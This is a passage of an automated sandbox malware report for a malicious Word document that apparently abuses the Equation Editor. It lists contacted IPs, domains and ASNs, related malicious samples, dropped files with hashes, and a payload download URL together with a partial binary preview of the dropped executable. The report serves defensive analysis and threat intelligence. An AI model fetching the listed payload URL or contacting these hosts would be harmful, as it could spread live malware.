                    https://ca.sia.it/seccli/repository/CPS/poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://mail.privateemail.compoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpfalse
                      high
                      http://crl.chambersign.org/publicnotaryroot.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmpfalse
                        high
                        http://www.sk.ee/juur/crl/0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://crl.xrampsecurity.com/XGCA.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.e-certchile.cl/html/productos/download/CPSv1poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpfalse
                          high
                          http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://duylfM.compoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.sk.ee/cps/0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.valicert.com/1poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.%s.comPApoiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          low
                          http://193.239.147.103poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.entrust.net0Dpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.wellsfargo.com/certpolicy0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepoiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpfalse
                              high
                              https://secure.comodo.com/CPS0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                                high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zippoiuytrewsdfghjklmnbvcx.exefalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://servername/isapibackend.dllpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358077916.0000000008090000.00000002.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://crl.entrust.net/2048ca.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.comsign.co.il/cps0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://cps.chambersign.org/cps/publicnotaryroot.html0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  193.239.147.103
                                  unknownBrunei Darussalam
                                  35913DEDIPATH-LLCUSfalse
                                  172.111.202.41
                                  unknownUnited States
                                  39122BLACKNIGHT-ASIEtrue
                                  198.54.122.60
                                  unknownUnited States
                                  22612NAMECHEAP-NETUSfalse

                                  General Information

                                  Joe Sandbox Version:31.0.0 Emerald
                                  Analysis ID:345163
                                  Start date:27.01.2021
                                  Start time:19:28:44
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 7m 22s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:Pending Orders Statement -40064778.doc
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:7
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winDOC@8/13@11/3
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 9.2% (good quality ratio 5.3%)
                                  • Quality average: 49.5%
                                  • Quality standard deviation: 44.1%
                                  HCA Information:
                                  • Successful, ratio: 97%
                                  • Number of executed functions: 34
                                  • Number of non-executed functions: 1
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .doc
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42
                                  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  19:29:38API Interceptor40x Sleep call for process: EQNEDT32.EXE modified
                                  19:29:40API Interceptor898x Sleep call for process: poiuytrewsdfghjklmnbvcx.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  193.239.147.103SHIPPING DOCS.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/A8D4BE7F005361BFBD128FDF08D58189.html
                                  documenting.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D6BA86F557F0B3BF28711AA5C7497D8B.html
                                  Overdue_invoices.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
                                  SIT-10295.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/759EFD3939882C342360C054C0B0F139.html
                                  MT103_SWFT012621ONOMN.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/FF20D3DCE8649E687BDAC089AF53336F.html
                                  RFQ Tengco_270121.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/ED373B21DE74B174904C90C4F88850ED.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/817B8D2BFEA38CDAF771C594C8EDD2E5.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D11F9AABDFF0704F9266CD718DBD402A.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D1A437E767757AD4AED3D462BF223DC7.html
                                  Shipping Documents.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
                                  8Aobnx1VRi.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
                                  DSksIiT85D.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/84BABA4BCDFD79499D4EFDE97172FE7F.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/4360BD50C79123B72BE98F9871724C8D.html
                                  Updated Invoice{swift..exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/3815F0F23310F1653DD4231C92F53862.html
                                  mr kesh.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/B690B5BB2DC34BEDA854B2E34C821BF0.html
                                  SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/AC74DA1A537FAA26238A4038BDCC34AA.html
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/A835403D21646D38831BEFB4AACEE40A.html
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/CFA32E9D22202129AAEAB33745DD6268.html
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/8C0599C1B9B3E6070FB750C30A6E4DE5.html
                                  SecuriteInfo.com.Artemis326CF1417127.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/C153CE1CCAD2548C2547CF3FCE5D339E.html
                                  172.111.202.41documenting.docGet hashmaliciousBrowse
                                    198.54.122.60documenting.docGet hashmaliciousBrowse
                                      RFQ Tengco_270121.docGet hashmaliciousBrowse
                                        74725794.exeGet hashmaliciousBrowse
                                          pickup receipt,DOC.exeGet hashmaliciousBrowse
                                            Pi_74725794.exeGet hashmaliciousBrowse
                                              74725794.exeGet hashmaliciousBrowse
                                                New FedEx paper work review.exeGet hashmaliciousBrowse
                                                  New paper work document attached.exeGet hashmaliciousBrowse
                                                    DHL_AWB_1928493383.exeGet hashmaliciousBrowse
                                                      PGXPHWCclJQdkUDcrlQETWlRbmXQw.exeGet hashmaliciousBrowse
                                                        SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exeGet hashmaliciousBrowse
                                                          gc2hl6HPAVH5h1p.exeGet hashmaliciousBrowse
                                                            DHL7472579410110100.PDF.exeGet hashmaliciousBrowse
                                                              PO-104_171220.exeGet hashmaliciousBrowse
                                                                DHL_document11022020680908911.doc.exeGet hashmaliciousBrowse
                                                                  EOI5670995098732.exeGet hashmaliciousBrowse
                                                                    INQUIRY- NET MACHINES-122020.docGet hashmaliciousBrowse
                                                                      EE09TR0098654.exeGet hashmaliciousBrowse
                                                                        ENS003.xlsGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Trojan.Inject4.6124.20146.exeGet hashmaliciousBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            cybersng.duckdns.orgdocumenting.docGet hashmaliciousBrowse
                                                                            • 172.111.202.41
                                                                            RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                            • 104.37.4.35
                                                                            BRANDCARE ORDER.docGet hashmaliciousBrowse
                                                                            • 104.37.4.35
                                                                            http://ng.openmicchallenge.com/zankuqw/Y29saW4ubWFjZG9uYWxkQGJyaXRpc2hnYXMuY28udWs=Get hashmaliciousBrowse
                                                                            • 104.250.180.10
                                                                            mail.privateemail.comdocumenting.docGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            74725794.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            Enq No 34 22-01-2021.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            pickup receipt,DOC.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Trojan.nm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.qm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            Pi_74725794.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            74725794.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            New FedEx paper work review.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            New paper work document attached.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            DHL_AWB_1928493383.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            PGXPHWCclJQdkUDcrlQETWlRbmXQw.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            gc2hl6HPAVH5h1p.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60

                                                                            ASN

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            DEDIPATH-LLCUSSHIPPING DOCS.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            documenting.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            Overdue_invoices.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            Tender documents_FOB_Offer_Printout.PDF.exeGet hashmaliciousBrowse
                                                                            • 45.15.143.189
                                                                            SIT-10295.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            MT103_SWFT012621ONOMN.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            Shipping Documents.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            8Aobnx1VRi.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            DSksIiT85D.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            Updated Invoice{swift..exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            mr kesh.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            BLACKNIGHT-ASIEdocumenting.docGet hashmaliciousBrowse
                                                                            • 172.111.202.41
                                                                            spptqzbEyNlEJvj.exeGet hashmaliciousBrowse
                                                                            • 91.210.233.220
                                                                            Request a quote Mitsubishi Japan XN501.exeGet hashmaliciousBrowse
                                                                            • 81.17.241.117
                                                                            6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                                            • 81.17.241.117
                                                                            cGLVytu1ps.exeGet hashmaliciousBrowse
                                                                            • 78.153.213.7
                                                                            4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                                                            • 78.153.213.7
                                                                            mb10.exeGet hashmaliciousBrowse
                                                                            • 78.153.210.4
                                                                            mb10.exeGet hashmaliciousBrowse
                                                                            • 78.153.210.4
                                                                            https://99756260.us17.list-manage.com/pages/track/click?u=ae9ce42233ecb67da0142e610&id=4eb4fb4732/#YXJtYW5kby5jaGF2ZXpAb3prLmNvbQ==Get hashmaliciousBrowse
                                                                            • 78.153.210.7
                                                                            emotet-1.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Emotet_7406.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Emotet_7406.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            emotet.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Paypal.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Paypal.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            emotet.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            emotet.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            960-27-621120-257 & 960-27-621120-969.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Rechnung.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Open invoices.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            NAMECHEAP-NETUSdocumenting.docGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            #B30COPY.htmGet hashmaliciousBrowse
                                                                            • 198.54.115.249
                                                                            AE-808_RAJEN.exeGet hashmaliciousBrowse
                                                                            • 68.65.122.156
                                                                            RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            quote20210126.exe.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            MV TAN BINH 135.pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236
                                                                            IMG_155710.docGet hashmaliciousBrowse
                                                                            • 199.192.18.134
                                                                            bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                            • 199.192.21.36
                                                                            Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                            • 199.192.21.36
                                                                            winlog(1).exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            Revise Bank Details_pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exeGet hashmaliciousBrowse
                                                                            • 198.187.31.7
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                                            • 198.187.31.7
                                                                            Payment Swift Copy_USD 206,832,000.00.pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236
                                                                            INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.244
                                                                            DSksIiT85D.exeGet hashmaliciousBrowse
                                                                            • 199.188.200.97
                                                                            file.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236
                                                                            Tebling_Resortsac_FILE-HP38XM.htmGet hashmaliciousBrowse
                                                                            • 104.219.248.112
                                                                            file.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                            Category:dropped
                                                                            Size (bytes):59134
                                                                            Entropy (8bit):7.995450161616763
                                                                            Encrypted:true
                                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):3.078657124509345
                                                                            Encrypted:false
                                                                            SSDEEP:6:kKbzmbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:TT3kPlE99SNxAhUeo+aKt
                                                                            MD5:A520165884A1CB8BD99E95808D9CA131
                                                                            SHA1:0A36C41C3E673BF089B4C5CF1502119F7FBF9838
                                                                            SHA-256:7FCA5A7CDA786E74804A9575B9CCF004E858B5F91652B434C9C2D7FF36FA42EE
                                                                            SHA-512:5AD9B8368A31CEBF69B82D77B9E319E26F6D153F9B43B35C655F7CD318BCF579ACF5BA911C806C21BE934DB958B0396CA7E6160D76A4274A3AD6952958486E71
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: p...... ............4...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:downloaded
                                                                            Size (bytes):246784
                                                                            Entropy (8bit):5.925208163230513
                                                                            Encrypted:false
                                                                            SSDEEP:3072:K/uLx1t8/TCCQKvI3zEl0JHPXzy/4ELgBmDiUvQk85lNphtv:KWt18Q2I3zMCfzt/9
                                                                            MD5:D0154FB70ABD786136AE9F68F285541C
                                                                            SHA1:42988286A1993959373A692AC455375B6AD2AE76
                                                                            SHA-256:E83D03CCD3C91744C4BC4D43A1EA9D55FC7211237F7197C33838507B92D50024
                                                                            SHA-512:8A6660F2A0A1C0A6186FEDD78CE8D5F2BA3FE504E5E0E0113116FAFE99E7604E14EE53D58A0E3B0BB780C59AB5392B6212B5B3610986DBD587BB9EBE52B1B313
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            IE Cache URL:http://cy.kl-re.com//power/bo/boobov.exe
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..`................................. ........@.. ....................... ............`.....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..............................P .......................................................................................................................................................................*.r\..p(N........s.........r`..p.....sO........*.r..p......%.r..p.%.r...p.%.r..p.(<...*.r..p......%.r..p.%.r...p.%.r...p.%.r..p.(<...*.r..p......%.r=f.p.%.r...p.%.r=f.p.%.r.g.p.(<...*~~....:....(0...sg........~....*. ....*2rx..p.()...*2r...p.()...*......(....*~~....:....(
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2658F6C0-C679-4D43-96D3-E7E6CC77C67B}.tmp
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1024
                                                                            Entropy (8bit):1.1344146986492145
                                                                            Encrypted:false
                                                                            SSDEEP:6:wIgJ6FtSFxq6FtSFaHwNgREqAWlgFJA/jlll8vlw2FrA:XJwdwaQk5uFJAbuvq2ZA
                                                                            MD5:5D451C185B7D589A04AA6712177E0694
                                                                            SHA1:06592E243DD2C109AD226C5F703B6B33AA0ACCFE
                                                                            SHA-256:7D34E941188ACA030691224627FCE62CACE5C65FEC3DE81B0CE73AA74375E6CF
                                                                            SHA-512:CCAD871C8B2740851AE96A13AC8E5F7A02A91B5453EFC053C199FB72E4F514F16D0ED8D0E61BE86DC5942249BDACFF10FB564A8F2AE80B252F744099073AA4E1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: . . . . . . . . . .1.4.6.8.3.9.1.2._.4.0.6.1.9.1.6.4.0.6.1.9.1.6. . . . . . . ._.4.0.6.1.9.1.6.4.0.6.1.9.1.6.......................................=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmp
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1024
                                                                            Entropy (8bit):0.05390218305374581
                                                                            Encrypted:false
                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
